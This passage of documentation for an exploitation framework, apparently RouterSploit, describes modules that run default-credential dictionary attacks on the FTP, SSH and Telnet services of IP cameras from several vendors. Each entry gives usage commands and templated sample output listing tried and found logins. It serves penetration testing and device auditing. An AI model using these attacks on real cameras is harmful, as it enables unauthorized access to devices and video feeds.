[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/iqinvision/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IQInvision Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/iqinvision/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/iqinvision/ssh_default_creds rsf (IQInvision Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IQInvision Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/iqinvision/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IQInvision Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/iqinvision/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/iqinvision/telnet_default_creds rsf (IQInvision Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IQInvision Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/jvc/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against JVC Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/jvc/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/jvc/ftp_default_creds rsf (JVC Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (JVC Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/jvc/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against JVC Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/jvc/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/jvc/ssh_default_creds rsf (JVC Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (JVC Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/jvc/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against JVC Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/jvc/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/jvc/telnet_default_creds rsf (JVC Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (JVC Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/mobotix/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mobotix Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/mobotix/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/mobotix/ftp_default_creds rsf (Mobotix Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mobotix Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/mobotix/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mobotix Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/mobotix/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5.
If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/mobotix/ssh_default_creds rsf (Mobotix Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mobotix Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/mobotix/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Mobotix Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/mobotix/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/mobotix/telnet_default_creds rsf (Mobotix Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mobotix Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/samsung/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Samsung Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/samsung/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/samsung/ftp_default_creds rsf (Samsung Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Samsung Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found!
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/samsung/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Samsung Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/samsung/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/samsung/ssh_default_creds rsf (Samsung Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Samsung Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/samsung/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Samsung Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/samsung/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/samsung/telnet_default_creds rsf (Samsung Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Samsung Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/sentry360/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Sentry360 Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/sentry360/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/sentry360/ftp_default_creds rsf (Sentry360 Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Sentry360 Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/sentry360/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Sentry360 Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/sentry360/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/sentry360/ssh_default_creds rsf (Sentry360 Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Sentry360 Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/sentry360/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Sentry360 Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/sentry360/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/sentry360/telnet_default_creds rsf (Sentry360 Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Sentry360 Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/siemens/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Siemens Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/siemens/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/siemens/ftp_default_creds rsf (Siemens Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Siemens Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/siemens/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Siemens Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/siemens/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/siemens/ssh_default_creds rsf (Siemens Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Siemens Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/siemens/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Siemens Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/siemens/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/siemens/telnet_default_creds rsf (Siemens Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Siemens Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! 
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/speco/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Speco Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/speco/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/speco/ftp_default_creds rsf (Speco Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Speco Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/speco/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Speco Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/speco/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5.
If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/speco/ssh_default_creds rsf (Speco Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Speco Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/speco/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Speco Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/speco/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/speco/telnet_default_creds rsf (Speco Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Speco Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/stardot/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Stardot Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/stardot/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/stardot/ftp_default_creds rsf (Stardot Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Stardot Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found!
Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/stardot/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Stardot Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/stardot/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/stardot/ssh_default_creds rsf (Stardot Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Stardot Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/stardot/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Stardot Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. 
Do: `use creds/cameras/stardot/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/stardot/telnet_default_creds rsf (Stardot Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Stardot Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/vacron/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Vacron Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/vacron/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/vacron/ftp_default_creds rsf (Vacron Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Vacron Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/vacron/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Vacron Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/vacron/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/vacron/ssh_default_creds rsf (Vacron Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Vacron Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! 
